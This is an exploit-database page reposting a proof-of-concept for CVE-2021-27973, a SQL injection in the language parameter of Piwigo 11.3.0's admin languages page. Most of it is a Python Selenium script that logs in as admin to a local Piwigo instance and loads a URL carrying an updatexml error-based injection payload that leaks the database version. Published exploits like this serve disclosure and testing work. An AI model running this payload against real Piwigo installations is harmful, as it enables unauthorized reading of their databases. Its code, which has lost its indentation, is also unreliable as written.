Advertisement






Piwigo 11.3.0 SQL Injection

CVE Category Price Severity
CVE-2021-27973 CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-30
CVSS EPSS EPSSP
CVSS:4.0/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040162

Below is a copy:

Piwigo 11.3.0 SQL Injection
# Exploit Title: SQL injection in language parameter to admin.php?page=languages.on Piwigo 11.3.0
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.30.2021
# Vendor: https://piwigo.org/
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
# CVE: CVE-2021-27973

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE-2021-27973

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/piwigo/"

#enter your login username
username="admin"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"

print("Loading... ;)")
time.sleep(1)
browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Languages Exploit
time.sleep(5)
browser.get(("
http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate
"))

print("The payload for category Languages is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

---------------------------------

# Exploit Title: SQL injection in language parameter to
admin.php?page=languages.on Piwigo 11.3.0
# Date: 04.30.2021s
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://piwigo.org/
# Software Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-27973
# more: https://www.nu11secur1ty.com/2021/04/cve-2021-27973.html

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum